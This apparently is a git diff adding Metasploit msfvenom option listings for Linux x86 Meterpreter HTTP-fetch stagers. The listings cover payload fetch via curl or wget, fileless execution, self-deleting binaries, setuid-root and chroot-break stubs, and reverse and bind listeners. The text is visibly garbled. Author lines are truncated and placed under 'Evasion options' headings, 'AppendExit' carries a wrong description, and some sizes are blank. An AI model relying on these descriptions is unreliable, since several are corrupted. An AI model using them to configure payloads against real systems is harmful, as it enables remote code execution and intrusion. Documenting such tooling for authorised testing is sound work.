+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_nonx_tcp.txt new file mode 100644 index 0000000..5b8ac46 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_nonx_tcp.txt @@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Bind TCP Stager + Module: payload/cmd/linux/http/x86/meterpreter/bind_nonx_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: +Evasion options for payload/cmd/linux/http/x86/meterpreter/bind_nonx_tcp: +========================= + +om> + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME fxLsSRldGnIi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..d04a06c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_tcp.txt @@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Bind TCP Stager (Linux x86) + Module: payload/cmd/linux/http/x86/meterpreter/bind_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/linux/http/x86/meterpreter/bind_tcp: +========================= + + + skape + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZZOVgYZknLux no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Listen for a connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_tcp_uuid.txt new file mode 100644 index 0000000..20af858 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_tcp_uuid.txt @@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Bind TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/http/x86/meterpreter/bind_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No +Evasion options for payload/cmd/linux/http/x86/meterpreter/bind_tcp_uuid: +========================= + +am Webb + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ntRGzTtlAXTs no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Listen for a connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-find_tag.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-find_tag.txt new file mode 100644 index 0000000..8af4237 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-find_tag.txt @@ -0,0 +1,101 @@ + + Name: HTTP Fetch, Find Tag Stager + Module: payload/cmd/linux/http/x86/meterpreter/find_tag + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 105 + +Evasion options for payload/cmd/linux/http/x86/meterpreter/find_tag: +========================= + +b@rapid7.com> + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZJGqgddAl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Use an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + TAG XjEz yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_ipv6_tcp.txt new file mode 100644 index 0000000..24cf096 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_ipv6_tcp.txt @@ -0,0 +1,110 @@ + + Name: HTTP Fetch, Reverse TCP Stager (IPv6) + Module: payload/cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 111 + +Evasion options for payload/cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp: +========================= + +d7.com> + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME sluXEOyTHDc no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Connect back to attacker over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_nonx_tcp.txt new file mode 100644 index 0000000..6897916 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_nonx_tcp.txt @@ -0,0 +1,109 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/x86/meterpreter/reverse_nonx_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: +Evasion options for payload/cmd/linux/http/x86/meterpreter/reverse_nonx_tcp: +========================= + + + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME wyKQhFkS no Name to use on remote system when storing payload; cannot contain 